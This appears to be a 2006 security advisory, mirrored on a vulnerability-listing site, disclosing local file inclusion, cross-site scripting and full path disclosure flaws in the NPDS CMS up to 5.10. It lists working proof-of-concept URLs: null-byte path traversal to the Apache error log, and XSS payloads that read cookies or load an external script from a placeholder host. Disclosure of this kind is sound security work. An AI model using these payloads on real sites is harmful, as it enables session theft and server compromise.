Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA20515] WebFORM and FORM2MAIL Mail Header Injection Vulnerability

[Full-disclosure] Docebo CMS 3.0.3, Remote command execution

'Multiple Sql injection and XSS in integramod portal

PHP-Nuke <= 7.9 Search XSS Vulnerability

From:	gmdarkfig_(at)_gmail.com <gmdarkfig_(at)_gmail.com>
Date:	09.06.2006
Subject:	NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure

// Script
Web -------- www.npds.org
versions --- NPDS <= 5.10
Solutions -- None official
Note ------- Vendor has been contacted

// Local Inclusion
http://[...]/header.php?Default_Theme=../apache/logs/error.log%00
http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../..
/apache/logs/error.log%00

// Cross Site Scripting
http://[...]/header.
php?Titlesitename=</title><script>alert(document.
cookie)</script>
http://[...]/header.php?sitename="><script>alert(document.
cookie)</script>
http://[...]/meta/meta.php?nuke_url="><script>alert(document.
cookie)</script>
http://[...]/viewforum.php?forum=2"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&post_id=888"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&topic="><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&arbre="><script src=http://[...]/xss.js>
http://[...]/user.php?op=only_newuser&uname="><script src=http://[...]/xss.js>
http://[...]/user.php?op=only_newuser&email="><script src=http://[...]/xss.js>

// Full Path Disclosure
http://[...]/header.php
http://[...]/modules/contact/contact.php
http://[...]/modules/sform/forum/forum_extender.php

// Credits
by DarkFig -- http://www.acid-root.new.fr/advisories/npds510.txt